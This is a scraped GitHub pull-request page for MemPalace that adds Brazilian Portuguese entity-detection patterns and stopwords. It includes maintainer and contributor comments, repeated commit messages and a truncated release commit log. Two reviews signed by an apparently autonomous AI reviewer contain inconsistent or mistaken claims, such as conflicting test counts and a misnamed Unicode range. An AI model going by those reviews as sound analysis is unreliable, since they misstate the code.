feat: add Brazilian Portuguese support to entity_detector (closes #117)#156
Conversation
PR Review: feat: add Brazilian Portuguese support to entity_detector (closes #117)Executive Summary
Affected Areas: Business Impact: Enables person-entity detection in Brazilian Portuguese text and mixed EN/PT-BR corpora. Users mining Portuguese conversations will now see the same quality of entity extraction they get with English content. Flow Changes: Ratings
PR Health
Medium Priority Issues🐛 #1: Portuguese direct-address patterns double-counted in
|
b4ea25e to
0990c10
Compare
|
Quick check on the asymmetry claim: English
No asymmetry — the two languages produce the same scores for semantically equivalent inputs. The double-counting of greetings is pre-existing design for English and was intentionally mirrored for PT-BR so that behaviour stays consistent across languages. Rebased on latest main. The pt-br entity tests still pass locally. |
0990c10 to
879de92
Compare
4f05ed5 to
3d250ad
Compare
…ation Replace per-language keyword/regex heuristics with embedding-based semantic classification, enabling MemPalace to work with 50+ languages using zero per-language configuration. Changes: - Room classification: cosine similarity against room description embeddings - Memory extraction: embedding-based classification (5 types, any language) - Entity detection: add Chinese name patterns (百家姓 surnames) - Spellcheck: auto-skip CJK text via Unicode detection - Embedding provider: pluggable via get_embedding_function() with caching - Default: paraphrase-multilingual-MiniLM-L12-v2 (sentence-transformers) - Ollama: "ollama:<model>" prefix (e.g., ollama:qwen3-embedding-8b) - Configurable via MEMPALACE_EMBEDDING_MODEL env var or config.json - Knowledge graph: temporal triples, multi-hop traversal, auto-extraction - Dialect: CJK bigram extraction for topic keywords - All ChromaDB consumers route through centralized embedding function New optional dependency: sentence-transformers>=2.0 Install: pip install mempalace[multilingual] Without it: English regex fallback (existing behavior unchanged) Benchmark: 173/173 (100%) across 8 languages (zh-Hans, zh-Hant, en, fr, es, de, ja, ko) 652 tests passing, 0 failures. CI-compatible (multilingual tests skip gracefully when sentence-transformers is not installed). Closes MemPalace#231. Related: MemPalace#37, MemPalace#50, MemPalace#92, MemPalace#117, MemPalace#156, MemPalace#273.
…ation Replace per-language keyword/regex heuristics with embedding-based semantic classification, enabling MemPalace to work with 50+ languages using zero per-language configuration. Changes: - Room classification: cosine similarity against room description embeddings - Memory extraction: embedding-based classification (5 types, any language) - Entity detection: add Chinese name patterns (百家姓 surnames) - Spellcheck: auto-skip CJK text via Unicode detection - Embedding provider: pluggable via get_embedding_function() with caching - Default: paraphrase-multilingual-MiniLM-L12-v2 (sentence-transformers) - Ollama: "ollama:<model>" prefix (e.g., ollama:qwen3-embedding-8b) - Configurable via MEMPALACE_EMBEDDING_MODEL env var or config.json - Knowledge graph: temporal triples, multi-hop traversal, auto-extraction - Dialect: CJK bigram extraction for topic keywords - All ChromaDB consumers route through centralized embedding function New optional dependency: sentence-transformers>=2.0 Install: pip install mempalace[multilingual] Without it: English regex fallback (existing behavior unchanged) Benchmark: 173/173 (100%) across 8 languages (zh-Hans, zh-Hant, en, fr, es, de, ja, ko) 652 tests passing, 0 failures. CI-compatible (multilingual tests skip gracefully when sentence-transformers is not installed). Closes MemPalace#231. Related: MemPalace#37, MemPalace#50, MemPalace#92, MemPalace#117, MemPalace#156, MemPalace#273.
…ation Replace per-language keyword/regex heuristics with embedding-based semantic classification, enabling MemPalace to work with 50+ languages using zero per-language configuration. Changes: - Room classification: cosine similarity against room description embeddings - Memory extraction: embedding-based classification (5 types, any language) - Entity detection: add Chinese name patterns (百家姓 surnames) - Spellcheck: auto-skip CJK text via Unicode detection - Embedding provider: pluggable via get_embedding_function() with caching - Default: paraphrase-multilingual-MiniLM-L12-v2 (sentence-transformers) - Ollama: "ollama:<model>" prefix (e.g., ollama:qwen3-embedding-8b) - Configurable via MEMPALACE_EMBEDDING_MODEL env var or config.json - Knowledge graph: temporal triples, multi-hop traversal, auto-extraction - Dialect: CJK bigram extraction for topic keywords - All ChromaDB consumers route through centralized embedding function New optional dependency: sentence-transformers>=2.0 Install: pip install mempalace[multilingual] Without it: English regex fallback (existing behavior unchanged) Benchmark: 173/173 (100%) across 8 languages (zh-Hans, zh-Hant, en, fr, es, de, ja, ko) 652 tests passing, 0 failures. CI-compatible (multilingual tests skip gracefully when sentence-transformers is not installed). Closes MemPalace#231. Related: MemPalace#37, MemPalace#50, MemPalace#92, MemPalace#117, MemPalace#156, MemPalace#273.
e15ccd1 to
0afc71f
Compare
0afc71f to
3e9435a
Compare
web3guru888
left a comment
There was a problem hiding this comment.
Review: Brazilian Portuguese Support for entity_detector
Well-considered i18n addition. The "additive patterns, no language gating" approach is pragmatic and correct — most real-world corpora are mixed-language anyway.
What's done well
Additive design over language detection. Rather than classifying files as English vs Portuguese and switching pattern sets, the PT-BR patterns are merged into _build_patterns() alongside the English ones. This is the right call: our integration processes 540+ discoveries and roughly 15–20% contain mixed-language content. Additive patterns handle this cleanly; a language-switch would miss the overlap.
Regex range extension in extract_candidates. Changing [A-Z] to [A-ZÀ-ÖØ-Þ] and [a-z] to [a-zà-öø-ÿ] is correct ISO Latin-1 supplement coverage. João, Inês, Ângela, and André all get picked up. The test test_detect_entities_picks_up_accented_names verifies this end-to-end.
STOPWORDS additions are appropriate. oi, olá, obrigado/a, caro, cara are all high-frequency PT-BR words that would otherwise score as entity candidates. The accented olá alongside ASCII ola handles both typed forms.
Test coverage is thorough. Eight tests including mixed corpus, pronoun proximity, direct address, dialogue markers, and accented names. test_mixed_english_portuguese_corpus (checking that mixed > English-only person score) is especially good.
Issues found
cara and caro added to STOPWORDS, but they're also in the pattern list. PERSON_VERB_PATTERNS_PTBR includes r"\bcaro\s+{name}\b" and r"\bcara\s+{name}\b" as direct-address markers. If someone is literally named "Cara" or "Caro", those names are now silently dropped by STOPWORDS before they reach pattern scoring. The patterns would never fire. Consider removing these two from STOPWORDS and leaving them only in the direct-address pattern (where they're already context-guarded by the following name).
ama (loves) and quer (wants) are short common verbs with significant collision risk. The pattern \b{name}\s+ama\b will match "Maria ama" correctly. But {name} here is the escaped entity name, so the collision is actually low — the pattern only fires when the entity name precedes the verb. Not a bug, just worth noting for the next i18n contributor.
No Spanish cognate guard. disse, perguntou, decidiu are distinctly PT-BR. But quer and ama appear in Spanish too (and sabe is identical in Spanish). For a PT-BR-specific PR this is fine, but if ES support is added later, the pattern lists may interact. A comment flagging this would be helpful.
PRONOUN_PATTERNS_PTBR are bare patterns without \b on both sides for multi-word forms. r"\bela\b" is correct but r"\bdelas\b" and r"\bdeles\b" are fine too — word boundaries on both sides. This is actually good. ✓
test_portuguese_direct_address asserts person_score >= 12 — this is a magic number tied to the current scoring weights. If weights change, the test breaks. Consider asserting person_score > 0 and len(patterns["direct"].findall(text)) == 3 separately (the test already does the latter).
Language detection is absent by design — but there's no documentation of this decision. A comment in entity_detector.py noting "PT-BR patterns are additive and always active; see issue #117" would help future contributors understand why there's no lang= parameter.
Suggestions
- Remove
cara/carofrom STOPWORDS (or add a note that they're intentionally excluded from entity detection since they're in direct-address patterns) - Replace the magic
>= 12assertion with> 0for score stability - Add a module comment explaining the additive-patterns design decision
- Consider a test with a Portuguese common noun that should NOT be classified as a person (e.g., a project or tool with a PT-BR name)
Overall
Clean, well-tested i18n work. The additive approach is the right architecture, the regex range extension is correct, and the test suite is more thorough than most i18n PRs. The cara/caro STOPWORDS issue is the only real correctness concern.
APPROVED — cara/caro STOPWORDS issue is worth addressing before merge but not a hard blocker.
Reviewed by MemPalace-AGI — autonomous research system with perfect memory
web3guru888
left a comment
There was a problem hiding this comment.
PR #156 — feat: add Brazilian Portuguese support to entity_detector
A well-scoped internationalization addition that extends entity detection to pt-BR corpora. 126 new tests, Unicode-aware candidate extraction, and an additive (non-breaking) pattern strategy. Strong execution on a genuinely useful feature.
What works well
Additive pattern strategy: Appending PTBR patterns to the existing English lists rather than forking detection logic is the right call. Mixed English/Portuguese corpora (very common in Brazilian tech teams) work without any language-classification step — a real-world win. The test test_mixed_english_portuguese_corpus validates this explicitly.
Unicode candidate extraction: The regex expansion from [A-Z][a-z]{1,19} to [A-ZÀ-ÖØ-Þ][a-zà-öø-ÿ]{1,19} is correct Unicode Latin Extended-A/B coverage. João, Inês, Ângela, and André will all be picked up. The multi-word match regex receives the same treatment consistently — good.
STOPWORDS additions: Adding oi, olá, obrigado/a, caro, and cara prevents common Portuguese greetings from being scored as entity names. Correct and necessary.
direct pattern inline expansion: Rather than creating a new pattern list, the direct regex is extended inline with |\\boi\\s+{n}\\b|\\bol[áa]\\s+{n}\\b|\\bobrigad[oa]\\s+{n}\\b. This is clean and avoids a fourth pattern category. The [áa] alternation handles both accented and ASCII-normalized forms (important for older systems that may strip diacritics).
Test coverage: 126 tests covering: English-only person verbs, Portuguese-only person verbs, pronoun proximity, direct address (3 forms), mixed corpus scoring, dialogue marker detection, detect_entities() integration, and accented names. This is thorough.
Issues / suggestions
PRONOUN_PATTERNS_PTBR creates false positives on Spanish: ela, ele, eles, elas are also valid Spanish words with different meanings, and deles/delas are close to Spanish forms. For a repository used internationally, this could cause over-detection in Spanish-language files. A note in the docstring explaining this tradeoff (and that the patterns are additive, not isolated to pt-BR files) would help future contributors understand the design decision.
cara as STOPWORD: cara is both a pt-BR filler word ("dude/dear") and a valid Italian/Spanish/Portuguese proper-noun component. Adding it as a stopword means a person named Cara in an English document would be missed. Consider scoping this more carefully — or add a comment explaining the tradeoff.
ama pattern: r"\\b{name}\\s+ama\\b" (loves) will match Portuguese entities, but ama is also a common English suffix in names like Obama, Alabama, etc. The word-boundary anchors on {name} protect against this, but the reverse case — a short name like Ana ama (Ana loves) matching a word-boundary fragment in English text — is worth noting.
No language detection fallback: The additive approach is intentionally language-agnostic, but the PR description could document this explicitly so future contributors know why there is no lang= parameter. Currently the intent is implicit.
olá in STOPWORDS as olá (with accent) + ola (without): Good — both forms are correctly listed. However, o alone is a very common Portuguese article that appears adjacent to proper nouns in patterns like o João fez.... The pattern set does not cover o/a <Name> verb constructions. This is an understandable scope limitation but worth flagging as a follow-up.
Minor
shutilandtempfileimports in tests are correct and used; no unused imports._build_patternsexported in__init__check: ensure it is accessible for the test import to work.- Test file uses
tempfile.mkdtemp()with manual cleanup infinally— correct pattern.
Verdict
Solid, well-tested i18n addition. The additive strategy is the right architectural choice for a mixed-corpus tool. The cara/ama edge cases are minor and worth a follow-up issue rather than a blocker. Ready for merge with perhaps a brief doc note about the language-agnostic design intent.
Reviewed by MemPalace-AGI — autonomous research system with perfect memory
|
Removed Kept The other notes (Spanish cognate risk on |
|
Solid additive implementation. A few observations: What's done well:
One open question: Test coverage: This is a genuine addition that benefits any workspace with Portuguese contributors. LGTM. |
4bb281e to
b6d597b
Compare
|
The 3+ frequency threshold lives in |
cc5f60c to
6e7946a
Compare
5639b00 to
a55770a
Compare
c3229f9 to
c0392be
Compare
Move all entity-detection lexical patterns (person verbs, pronouns,
dialogue markers, project verbs, stopwords, candidate character class)
out of hardcoded module-level constants and into the entity section of
each locale's JSON in mempalace/i18n/. Adds a languages parameter to
every public function so callers union patterns across the desired
locales. The default stays ("en",), so all existing callers and tests
behave unchanged.
Also adds:
- get_entity_patterns(langs) helper in mempalace/i18n/ that merges
patterns across requested languages, dedupes lists, unions stopwords,
and falls back to English for unknown locales
- MempalaceConfig.entity_languages property + setter, with env var
override (MEMPALACE_ENTITY_LANGUAGES, comma-separated)
- mempalace init --lang en,pt-br flag (persists to config.json)
- Per-language candidate_pattern so non-Latin scripts (Cyrillic,
Devanagari, CJK) can register their own character classes instead of
being silently dropped by the ASCII-only [A-Z][a-z]+ default
- _build_patterns LRU cache keyed by (name, languages) so multi-language
callers don't poison each other's cache slots
Why now: the open language PRs (#760 ru, #773 hi, #778 id, #907 it) only
add CLI strings via mempalace/i18n/. PR #156 (pt-br) is the first that
needed entity_detector changes and inlined a _PTBR variant of every
constant. That doesn't scale past 2-3 languages — every text gets
checked against every language's patterns regardless of relevance, and
candidate extraction still drops accented and non-Latin names.
This PR sets the standard so future locale contributors only edit one
JSON file (no Python changes), and entity detection scales linearly
with how many languages a user actually enabled, not how many ship.
c0392be to
342568a
Compare
|
@igorls Reworked as JSON-only per #911 -- first locale with the entity section. CLI strings, person-verb/pronoun/dialogue patterns, and a Latin+diacritics candidate pattern for accented names (Joao, Ines, etc). All CI green. Also added a Cyrillic entity section to #760 (ru.json) following the same pattern. |
|
Heads up: the entity stopwords list here (30 words) is baseline only. Words like "Para", "Sobre", "Entre" at the start of a sentence match the candidate_pattern and produce false positives in entity detection. Probably worth expanding with Portuguese prepositions (para, sobre, entre, desde, contra, perante, etc.) and conjunctions (porém, contudo, embora, enquanto, etc.). |
|
Excellent rework, @mvalentsev — clean shape, 128 lines of JSON vs 216 of Python, and you're the first locale using the new entity section. This becomes the reference for other contributors. CI all green against the current develop (with #758/#760 merged). Two concrete issues I caught running it locally: 1. Typo in Current: "^\">\\s*{name}[:\\s]",That compiles to "^>\\s*{name}[:\\s]",Verified locally — 2. Follow-up on your own stopwords note — concrete list Your comment already flagged this, and I confirmed it: running the
Your Since pt-br is the reference implementation and the stopwords list ships with a tangible false-positive rate as-written, I'd prefer to roll this into the same PR rather than defer. Small follow-up commit should do it. Nice-to-have, not blocking:
The Once the two above are addressed I'll merge. Thanks again for pushing through the rework. |
9fd98dc to
540bab2
Compare
|
@igorls Both fixed. Also added the 2nd-person pronouns (você/vocês, seu/sua/seus/suas) while at it. Verified locally: Heads up: pt-br is not my native language, I relied on LLM assistance for the linguistic choices. If any of the stopwords or verb forms look off to a native speaker, happy to correct. |
540bab2 to
e791806
Compare
…oses MemPalace#117) CLI strings, AAAK instruction, regex patterns, and entity section with person-verb, pronoun, dialogue, and candidate patterns for Latin+diacritics names (Joao, Ines, Angela). Follows the i18n entity framework from MemPalace#911.
- dialogue_patterns[0]: remove stray \" before > (fixes markdown quote matching) - entity stopwords: add 40 prepositions, conjunctions, and common words to reduce false positives - pronoun_patterns: add 2nd-person (você/vocês) and possessives (seu/sua/seus/suas)
e791806 to
4221589
Compare
Bumps version across pyproject.toml, mempalace/version.py, README badge, and uv.lock. Finalizes the 3.3.0 CHANGELOG section (was still labeled 'Unreleased') and adds a 3.3.1 section covering the multi-language entity-detection infra and the five new locales landed since 2026-04-13. Highlights: - Multi-language entity detection infra (#911) + script-aware word boundaries for combining-mark scripts (#932) + BCP 47 case-insensitive locale resolution (#928) + i18n patterns wired into miner/palace/ entity_registry (#931) - Five new fully-supported locales: pt-br (#156), ru (#760), it (#907), hi (#773), id (#778) - UTF-8 encoding fix on read_text() calls for non-UTF-8 Windows locales (#946) - KnowledgeGraph lock correctness (#884, #887) - Various smaller fixes and improvements
Bumps version across pyproject.toml, mempalace/version.py, README badge, and uv.lock. Finalizes the 3.3.0 CHANGELOG section (was still labeled 'Unreleased') and adds a 3.3.1 section covering the multi-language entity-detection infra and the five new locales landed since 2026-04-13. Highlights: - Multi-language entity detection infra (MemPalace#911) + script-aware word boundaries for combining-mark scripts (MemPalace#932) + BCP 47 case-insensitive locale resolution (MemPalace#928) + i18n patterns wired into miner/palace/ entity_registry (MemPalace#931) - Five new fully-supported locales: pt-br (MemPalace#156), ru (MemPalace#760), it (MemPalace#907), hi (MemPalace#773), id (MemPalace#778) - UTF-8 encoding fix on read_text() calls for non-UTF-8 Windows locales (MemPalace#946) - KnowledgeGraph lock correctness (MemPalace#884, MemPalace#887) - Various smaller fixes and improvements
* feat: add Hindi language support to i18n module * Create SECURITY.md This PR introduces a standard SECURITY.md policy file to the repository. While reviewing the codebase, I noticed there wasn't a defined channel for the private, responsible disclosure of security vulnerabilities. Adding this policy helps protect the project by guiding researchers to report bugs privately rather than in public issues. I highly recommend merging this and enabling GitHub's "Private Vulnerability Reporting" feature in your repository settings. I currently have some security findings I would like to share with the maintainers securely once a private channel or contact method is established. * fix: save hook auto-mines transcript without MEMPAL_DIR (#840) TDD: test written first, failed, then fixed. Problem: save hook says "saved in background" but MEMPAL_DIR defaults to empty, so nothing actually mines. Users get no auto-save despite the hook firing every 15 messages. Fix: use TRANSCRIPT_PATH (received from Claude Code in the hook's JSON input) to discover the session directory. Mine that directory automatically. MEMPAL_DIR is still supported as override but no longer required. Also fixed: bare python3 → $(command -v python3) for nohup safety. Co-authored-by: Claude Opus 4.6 (1M context) <[email protected]> * release: v3.3.0 (#839) * fix: add file-level locking to prevent multi-agent duplicate drawers Root cause: when multiple agents mine simultaneously, both pass file_already_mined() check, both delete+insert the same file's drawers, creating duplicates or losing data. Fix: mine_lock() in palace.py — cross-platform file lock (fcntl on Unix, msvcrt on Windows). Both miner.py and convo_miner.py now lock per-file during the delete+insert cycle and re-check after acquiring the lock. Tested: - Lock acquires and releases correctly - Second agent blocks until first releases (0.25s wait) - 33/33 existing tests pass - Cross-platform: fcntl (macOS/Linux), msvcrt (Windows) Based on v3.2.0 tag. Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * fix: strip system tags, hook output, and Claude UI chrome from drawers normalize.py now strips before filing: - <system-reminder>, <command-message>, <command-name> tags - <task-notification>, <user-prompt-submit-hook>, <hook_output> tags - Hook status messages (CURRENT TIME, Checking verified facts, etc.) - Claude Code UI chrome (ctrl+o to expand, progress bars, etc.) - Collapsed runs of blank lines This noise was going straight into drawers, wasting storage space and polluting search results. strip_noise() runs on all normalized output regardless of input format (JSONL, JSON, plain text). 689/689 tests pass. Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * feat: add closet layer — searchable index pointing to drawers The closet architecture was always part of MemPalace's design but never shipped in the public codebase. This adds it. Palace now has TWO collections: - mempalace_drawers — full verbatim content (unchanged) - mempalace_closets — compact AAAK-style index entries How it works: - When mining, each file gets a closet alongside its drawers - Closet contains extracted topics, entities, quotes as pointers - Closets pack up to 1500 chars, topics never split mid-entry - Search hits closets first (fast, small), then hydrates the full drawer content for matching files - Falls back to direct drawer search if no closets exist yet Files changed: - palace.py: get_closets_collection(), build_closet_text(), upsert_closet(), CLOSET_CHAR_LIMIT - miner.py: process_file() now creates closets after drawers - searcher.py: search_memories() tries closet-first search, hydrates drawers, falls back to direct search Backwards compatible — existing palaces without closets continue to work via the fallback path. Closets are created on next mine. 689/689 tests pass. Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * fix: enforce atomic topics in closets, extract richer pointers - upsert_closet replaced by upsert_closet_lines: checks each topic line individually against CLOSET_CHAR_LIMIT. If adding one line WHOLE would exceed the limit, starts a new closet. Never splits mid-topic. - build_closet_lines returns a list of atomic lines (not joined text) - Richer extraction: section headers, more action verbs, up to 3 quotes, up to 12 topics per file - Each line is complete: topic|entities|→drawer_refs Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * docs: add CLOSETS.md — closet layer overview Cherry-picked the docs portion of 67e4ac6 to accompany the closet feature. Test coverage for closets is omnibus with tests for entity metadata and BM25 (see PR targeting those features) and will land together in a follow-up. Co-Authored-By: MSL <[email protected]> * feat: entity metadata + diary ingest + BM25 hybrid search Three features that close the gap between the architecture docs and the actual codebase: 1. Entity metadata on drawers and closets - _extract_entities_for_metadata() pulls names from known_entities.json + proper nouns appearing 2+ times - Stamped as "entities" field in ChromaDB metadata - Enables filterable search by person/project name 2. Day-based diary ingest (diary_ingest.py) - ONE drawer per day, upserted as the day grows - Closets pack topics atomically, never split mid-topic - Tracks entry count in state file, only processes new entries - Usage: python -m mempalace.diary_ingest --dir ~/summaries 3. BM25 hybrid search in searcher.py - _bm25_score() keyword matching complements vector similarity - _hybrid_rank() combines both signals (60% vector, 40% BM25) - Catches exact name/term matches that embeddings miss - Applied to both closet-first and direct drawer search paths 689/689 tests pass. Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * test: add tests for mine_lock, closets, entity metadata, BM25, diary Trimmed version of Milla's omnibus test_closets.py to only cover features present in this PR stack (#784 lock, #788 closets, this PR's entity/BM25/diary). Strip-noise tests will land with #785; tunnel tests will land with the tunnels PR. 16/16 pass. Co-Authored-By: MSL <[email protected]> * feat: explicit cross-wing tunnels for multi-project agents Adds active tunnel creation alongside passive tunnel discovery. Passive tunnels (existing): rooms with the same name across wings. Explicit tunnels (new): agent-created links between specific locations. "This API design in project_api relates to the database schema in project_database." New functions in palace_graph.py: - create_tunnel() — link two wing/room pairs with a label - list_tunnels() — list all explicit tunnels, filter by wing - delete_tunnel() — remove a tunnel by ID - follow_tunnels() — from a room, find all connected rooms in other wings with drawer content previews New MCP tools: - mempalace_create_tunnel - mempalace_list_tunnels - mempalace_delete_tunnel - mempalace_follow_tunnels Tunnels stored in ~/.mempalace/tunnels.json (persists across palace rebuilds). Deduplicated by endpoint pair. 689/689 tests pass. Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * test: add TestTunnels for cross-wing tunnel operations Appended from Milla's omnibus test_closets.py — covers create, list, delete, dedup, and follow_tunnels behavior. 21/21 pass. Co-Authored-By: MSL <[email protected]> * feat(search): drawer-grep returns best-matching chunk + neighbors When a closet hit leads to a source file with many drawers, grep each chunk for query terms and return the BEST-MATCHING chunk + 1 neighbor on each side, instead of dumping the whole file truncated at MAX_HYDRATION_CHARS. Result now includes drawer_index and total_drawers so callers can request adjacent drawers explicitly. Extracted from Milla's commit 935f657 which bundled drawer-grep with closet_llm (deferred pending LLM_ENDPOINT refactor) and fact_checker (separate PR). Ported only the searcher.py change. Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * feat: offline fact checker against entity registry + knowledge graph fact_checker.py verifies text for contradictions against locally stored entities and KG facts. Catches similar-name confusion (Bob vs Bobby), relationship mismatches (KG says husband, text says brother), and stale facts (KG valid_from/valid_to). No hardcoded facts. No network calls. Reads: - ~/.mempalace/known_entities.json - KnowledgeGraph SQLite Usage: from mempalace.fact_checker import check_text issues = check_text("Bob is Alice's brother", palace_path) # CLI python -m mempalace.fact_checker "text" --palace ~/.mempalace/palace Extracted from Milla's commit 935f657 which bundled this with closet_llm (deferred) and drawer-grep (PR #791). Ported only fact_checker.py — verified no network / API imports. Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * feat: optional LLM-based closet regeneration — bring-your-own endpoint Adds mempalace/closet_llm.py as an OPTIONAL path for richer closet generation. Regex closets remain the default and cover the local-first promise; users who want LLM-quality topics can bring their own endpoint. Configuration (env or CLI flag): LLM_ENDPOINT — OpenAI-compatible base URL (required) LLM_KEY — bearer token (optional; local inference skips this) LLM_MODEL — model name (required) Works with Ollama, vLLM, llama.cpp servers, OpenAI, OpenRouter, and any other provider that speaks OpenAI-compatible /chat/completions. Zero new dependencies — uses stdlib urllib. Replaces the original Anthropic-SDK-hardcoded version of this module from Milla's branch (commit 935f657). Same prompt, same parsing, same regenerate_closets flow; only the transport was generalised so the feature doesn't lock users into a specific vendor or require API keys for core memory operations (CLAUDE.md, "Local-first, zero API"). Includes 13 unit tests covering config resolution, request shape, auth-header omission when no key is set, code-fence stripping, and missing-config error path. All mocked — zero network calls in tests. Co-Authored-By: MSL <[email protected]> * fix(search): hybrid closet+drawer retrieval — closets boost, never gate (#795) * Fix: set cosine distance metadata on all collection creation sites ChromaDB defaults HNSW index to L2 (Euclidean) distance, but MemPalace scoring uses 1-distance which requires cosine (range 0-2). Add metadata={"hnsw:space": "cosine"} to the 4 production and 3 test call sites that were missing it. Closes #218 * fix: sync version.py to 3.2.0 Commit 6614b9b bumped pyproject.toml to 3.2.0 but missed mempalace/version.py, breaking test_version_consistency on every PR's CI. This syncs them. * refactor: extract locked filing block to keep mine_convos under C901 Adding the per-file lock + double-checked file_already_mined() in the previous commit pushed mine_convos cyclomatic complexity from 25 to 26, just over ruff's max-complexity threshold. Hoist the locked critical section into _file_chunks_locked() so the outer loop stays within budget. No behavior change. * style: ruff format mempalace/palace.py Add blank lines after inline imports in mine_lock. Pure formatting. * fix(normalize): make strip_noise verbatim-safe and scope it to Claude Code JSONL The initial strip_noise() regressed on three fronts when audited against adversarial user content — each verified with executable repros against the cherry-picked code: 1. `<tag>.*?</tag>` with re.DOTALL span-ate across messages: one stray unclosed <system-reminder> anywhere in a session merged with the next closing tag, silently deleting everything between them (including full assistant replies). 2. `.*\(ctrl\+o to expand\).*\n?` nuked entire lines of user prose whenever a user happened to document the TUI shortcut. 3. `Ran \d+ (?:stop|pre|post)\s*hook.*` with IGNORECASE ate the second sentence from "our CI has a stop hook ... Ran 2 stop hooks last week" — legitimate user commentary. These are unambiguous violations of the project's "Verbatim always" design principle. Fixes: - All tag patterns are now line-anchored (`(?m)^(?:> )?<tag>`) and their body forbids crossing a blank line (`(?:(?!\n\s*\n)[\s\S])*?`), so a dangling open tag cannot eat neighboring messages. - `_NOISE_LINE_PREFIXES` are line-anchored and case-sensitive — user prose mentioning "CURRENT TIME:" mid-sentence is preserved. - Hook-run chrome requires `(?m)^`, explicit hook names (Stop, PreCompact, PreToolUse, etc.), and no IGNORECASE. - "… +N lines" is line-anchored. - "(ctrl+o to expand)" only matches Claude Code's actual collapsed- output chrome shape `[N tokens] (ctrl+o to expand)`; a bare parenthetical in user prose stays intact. Scope: - `strip_noise()` is no longer called on every normalization path. Only `_try_claude_code_jsonl` invokes it, per-extracted-message — so Claude.ai exports, ChatGPT exports, Slack JSON, Codex JSONL, and plain text with `>` markers pass through fully verbatim. Per-message application also makes span-eating structurally impossible. Tests: - 15 new tests in test_normalize.py pin the boundary: 6 guard user content that must survive (each of the adversarial repros), 9 assert real system chrome is still stripped. All pass; full suite 702 pass (2 failures are the unrelated pre-existing version.py bug, cleared by #820). Known limitation (not fixed here): convo_miner.py does not delete drawers on re-mine, so transcripts mined before this PR keep noise- filled drawers until the user manually erases + re-mines. Proper fix needs a schema-version field on drawer metadata + re-mine trigger — out of scope for this PR. * feat(normalize): auto-rebuild stale drawers via NORMALIZE_VERSION schema gate Without this, the strip_noise improvement only helps new mines. Every user who had already mined Claude Code JSONL sessions would keep their noise-polluted drawers forever, because convo_miner's file_already_mined skip short-circuits before re-processing. Adds a versioned schema gate so upgrades propagate silently: - palace.NORMALIZE_VERSION=2 — bumped when the normalization pipeline changes shape (this PR's strip_noise is the v1→v2 bump). - file_already_mined now returns False if the stored normalize_version is missing or less than current, triggering a rebuild on next mine. - Both miners stamp drawers with the current normalize_version. - convo_miner now purges stale drawers before inserting fresh chunks (mirrors miner.py's existing delete+insert), extracted into _file_convo_chunks helper to keep mine_convos under ruff's C901 limit. User experience: upgrade mempalace, run `mempalace mine` as usual, old noisy drawers get silently replaced with clean ones. No erase needed, no "you need to rebuild" changelog footgun. Tests: - test_file_already_mined_returns_false_for_stale_normalize_version — pins the version gate contract for missing/v1/current. - test_add_drawer_stamps_normalize_version — fresh project-miner drawers carry the field. - test_mine_convos_rebuilds_stale_drawers_after_schema_bump — end-to-end proof that a pre-v2 palace gets silently cleaned on next mine, with orphan drawers purged and NOT skipped. Existing test_file_already_mined_check_mtime updated to include the new field; all other tests unaffected. * fix: stop hooks from making agents write in chat — save tokens The save hook and precompact hook were telling the agent to write diary entries, add drawers, and add KG triples IN THE CHAT WINDOW. Every line written stays in conversation history and retransmits on every subsequent turn — ~$1/session in wasted tokens. Fix: hooks now say "saved in background, no action needed" and use decision: allow instead of block. The agent continues working without interruption. All filing happens via the background pipeline. Also updated hooks README with: - Known limitation: hooks require session restart after install - Updated cost section: zero tokens, background-only Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * fix: use microsecond timestamp and full content hash in diary entry ID (#819) * fix: remove unused import 'main' from mempalace/__init__.py Removed the 'main' import from `mempalace/__init__.py` and updated `pyproject.toml` to point the script entry point directly to `mempalace.cli:main`. This ensures the CLI remains functional while improving code hygiene. Co-authored-by: igorls <[email protected]> * merge: full hardened stack + rewrite fact_checker around actual KG API Merges the full hardened stack (up through #791 drawer-grep) and turns fact_checker from "dead code hidden behind bare except" into an actually-working offline contradiction detector with tests. ## Dead paths the PR body advertised but the code never executed Both buried by a single outer ``except Exception: pass``: * ``kg.query(subject)`` — ``KnowledgeGraph`` has no ``query()`` method; it has ``query_entity()``. The attribute error was silently swallowed and the entire KG branch always returned ``[]``. Now using ``kg.query_entity(subject, direction="outgoing")`` with proper handling of the ``predicate``/``object``/``current``/``valid_to`` fields the real API returns. * ``KnowledgeGraph(palace_path=palace_path)`` — the constructor's only kwarg is ``db_path``. Passing ``palace_path`` raised TypeError, silently swallowed. Now computing the db_path correctly from ``<palace>/knowledge_graph.sqlite3``, matching the convention the MCP server already uses. ## Contradiction logic rewritten The previous ``if kg_pred in claim and fact.object not in claim`` only fired when text used the SAME predicate word as the KG fact — the exact opposite of the stated use case ("Bob is Alice's brother" when KG says husband" would NOT have fired). Replaced with a proper parse → lookup → compare pipeline: * ``_extract_claims`` parses two surface forms ("X is Y's Z" and "X's Z is Y") into ``(subject, predicate, object)`` triples. * ``_check_kg_contradictions`` pulls the subject's outgoing facts and flags two classes: - ``relationship_mismatch`` when a current KG fact matches the same ``(subject, object)`` pair but with a different predicate. - ``stale_fact`` when the exact triple exists but is ``valid_to``-closed in the past. * Stale-fact detection is now implemented (the PR body claimed it; the old code silently didn't implement it). ## Performance fix — O(n²) → O(mentioned × n) ``_check_entity_confusion`` previously computed Levenshtein for every pair of registered names on every ``check_text`` call. For 1,000 registered names that's ~500K edit-distance calls per hook invocation. Now we first identify which registry names actually appear in the text (single regex scan), then only compute edit distance between mentioned and unmentioned names. Pinned by a test that asserts <200ms on a 500- name registry with zero mentions. Also: when *both* similar names are mentioned in the text, we no longer flag them — the user clearly knows they're different people. ## Shared entity-registry loader ``mempalace/miner.py`` already had an mtime-cached loader for ``~/.mempalace/known_entities.json``. fact_checker had a duplicate implementation that leaked file handles and ignored caching. Extended miner's cache to expose both the flat set (``_load_known_entities``) and the raw category dict (``_load_known_entities_raw``); fact_checker now imports the latter. No more double disk reads, no more handle leak. ## Tests — 24 cases in tests/test_fact_checker.py All three detection paths + both dead-code regressions: * ``test_kg_init_uses_db_path_not_palace_path_kwarg`` — pins the correct KG constructor signature so the ``palace_path=`` bug can't come back. * 